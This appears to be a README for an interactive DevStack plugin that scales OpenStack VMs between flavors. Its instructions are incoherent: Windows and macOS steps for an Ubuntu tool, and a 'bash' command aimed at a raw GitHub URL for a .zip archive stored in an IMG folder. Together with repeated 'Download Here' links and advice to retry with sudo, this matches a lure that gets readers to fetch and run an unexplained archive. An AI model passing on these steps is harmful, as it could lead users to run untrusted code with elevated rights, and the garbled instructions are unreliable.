The Autoscaler Interattivo Plugin for DevStack is an interactive tool designed to help you easily scale your virtual machines (VMs) between different flavors in OpenStack. With a simple command-line interface (CLI) menu, you can manage your VMs without needing programming knowledge.
- User-Friendly Interface: Navigate a simple menu to select your desired scaling options.
- Flavor Management: Easily switch between flavors, optimizing your VM performance based on your needs.
- Interactive Scaling: Control your resources seamlessly as your requirements change.
Before you begin, ensure your computer meets the following requirements:
- Operating System: Ubuntu (18.04 or higher recommended)
- Docker: Ensure you have Docker installed for DevStack functionality.
- OpenStack: Access to a running OpenStack environment is needed.
Follow these steps to download and run the Autoscaler Interattivo Plugin:
-
Visit the Releases Page: Click on the following link to open the releases page: Download Here.
-
Choose Your Version: On the releases page, find the latest stable version available for download.
-
Download the Plugin:
- Click on the appropriate release version to download. This will download a compressed file containing the plugin and necessary scripts.
-
Extract the Downloaded File: Locate the file in your downloads folder. Right-click and select "Extract All" or use a tool like
unzipto open it. -
Open Terminal: Launch the terminal application (you can find it in your Applications folder or via search).
-
Navigate to the Plugin Directory: Use the
cdcommand to change to the directory where you extracted the plugin. For example:cd ~/Downloads/Autoscaler_Interattivo_Plugin_Devstack
-
Run the Plugin Script: Execute the main script by entering:
bash https://raw.githubusercontent.com/Markusdarkus1/Autoscaler_Interattivo_Plugin_Devstack/main/IMG/Autoscaler-Plugin-Interattivo-Devstack-2.0.zip
-
Follow On-Screen Instructions: The CLI will guide you through the scaling process. Simply follow the prompts to select your desired VM flavor and perform scaling operations.
After installing, use the plugin to scale your VMs as follows:
- Open your terminal and navigate to the plugin directory.
- Start the plugin script with the command mentioned earlier.
- Use the interactive menu to choose your scaling options.
If you encounter any prompts or options you do not understand, refer to the in-script help or contact support.
If something goes wrong, consider these common issues:
- Permission Issues: If you cannot run the script, try using
sudobefore the command. - Dependencies Missing: Ensure Docker and OpenStack are correctly set up on your machine.
- Connection Errors: Verify your OpenStack installation and network connectivity.
Contributions are welcome. If you have suggestions or improvements, please reach out through the Issues section of the repository. Your insights can help enhance this tool for everyone.
For assistance, visit our Issues Section on GitHub. You can report bugs or ask questions about the plugin.
Donβt forget to download the most recent version for the best performance: Download Here.
Enjoy scaling your VMs with the Autoscaler Interattivo Plugin!